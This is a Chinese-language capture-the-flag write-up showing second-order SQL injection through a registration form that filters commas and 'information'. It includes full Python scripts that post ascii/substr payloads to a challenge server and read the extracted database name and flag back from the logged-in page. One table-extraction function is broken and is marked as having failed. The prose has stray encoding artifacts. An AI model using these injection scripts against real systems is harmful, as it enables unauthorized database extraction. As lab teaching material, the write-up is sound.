題目分析
題目描述為:SQL
題目主要功能界面分析:
主要分為注冊(cè)��、登陸、以及成功登陸后的一個(gè)界面��。
通過描述可以知道題目應(yīng)該存在SQL注入漏洞���。
掃描得知注冊(cè)界面存在SQL注入漏洞
嘗試構(gòu)造sql盲注語句如下
{'username': "1' and ELT(left((SELECT schema_name FROM information_schema.schemata limit 0,1),1)='d',SLEEP(5)) or '1'='1", 'password': 'admin', 'email': 'eamil@eamil.com'}
得到結(jié)果為
即存在過濾
測(cè)試發(fā)現(xiàn)過濾了逗號(hào)����、information
那么使用盲注應(yīng)該不太行了,但是username這邊的內(nèi)容是可以執(zhí)行��,所以我們將username的值拼接上查找出來的內(nèi)容���,利用登陸后會(huì)顯示用戶名做到一個(gè)二次注入的效果。
解題流程
首先可知注冊(cè)的sql語句應(yīng)該為
insert into tables values('$email','$username','$password')
我們通過控制post的參數(shù)
構(gòu)造sql語句為:
insert into tables values('admin1@admin.com','0'+ascii(substr((select database()) from 1 for 1))+'0','admin')
即插入的username即拼接上了我們要查找的
查數(shù)據(jù)庫腳本如下
import requests
import time
from bs4 import BeautifulSoup #html解析器
def getDatabase():
database = ''
for i in range(10):
data_database = {
'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
'password':'admin',
"email":"admin11@admin.com"+str(i)
}
#注冊(cè)
requests.post("http://159.138.137.79:52974/register.php",data_database)
login_data={
'password':'admin',
"email":"admin11@admin.com"+str(i)
}
response=requests.post("http://159.138.137.79:52974/login.php",login_data)
html=response.text #返回的頁面
soup=BeautifulSoup(html,'html.parser')
getUsername=soup.find_all('span')[0]#獲取用戶名
username=getUsername.text
if int(username)==0:
break
database+=chr(int(username))
return database
print(getDatabase())
得到數(shù)據(jù)庫名為web
然后嘗試獲取表名失敗��,因?yàn)檫^濾了information
看了評(píng)論說表名全靠猜哈哈
還是給上一個(gè)獲取flag的腳本
腳本中途獲取表名失敗了���,被我注釋了~~emmm
import requests
import time
from bs4 import BeautifulSoup #html解析器
def getDatabase():
database = ''
for i in range(10):
data_database = {
'username':"0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0",
'password':'admin',
"email":"admin11@admin.com"+str(i)
}
#注冊(cè)
requests.post("http://159.138.137.79:52974/register.php",data_database)
login_data={
'password':'admin',
"email":"admin11@admin.com"+str(i)
}
response=requests.post("http://159.138.137.79:52974/login.php",login_data)
html=response.text #返回的頁面
soup=BeautifulSoup(html,'html.parser')
getUsername=soup.find_all('span')[0]#獲取用戶名
username=getUsername.text
if int(username)==0:
break
database+=chr(int(username))
return database
print(getDatabase())
def getTables():
tables = ''
for i in range(10):
data_tables = {
'username':"0'+ascii(substr((select tables()) from "+str(i+1)+" for 1))+'0",
'password':'admin',
"email":"admin12@admin.com"+str(i)
}
#注冊(cè)
requests.post("http://159.138.137.79:52974/register.php",data_tables)
login_data={
'password':'admin',
"email":"admin12@admin.com"+str(i)
}
response=requests.post("http://159.138.137.79:52974/login.php",login_data)
html=response.text #返回的頁面
soup=BeautifulSoup(html,'html.parser')
getUsername=soup.find_all('span')[0]#獲取用戶名
username=getUsername.text
if int(username)==0:
break
tables+=chr(int(username))
return tables
'''
print(getTables())
'''
def getFlag():
flag = ''
for i in range(40):
data_flag = {
'username':"0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0",
'password':'admin',
"email":"admin32@admin.com"+str(i)
}
#注冊(cè)
requests.post("http://159.138.137.79:52974/register.php",data_flag)
login_data={
'password':'admin',
"email":"admin32@admin.com"+str(i)
}
response=requests.post("http://159.138.137.79:52974/login.php",login_data)
html=response.text #返回的頁面
soup=BeautifulSoup(html,'html.parser')
getUsername=soup.find_all('span')[0]#獲取用戶名
username=getUsername.text
if int(username)==0:
break
flag+=chr(int(username))
return flag
print(getFlag())
|
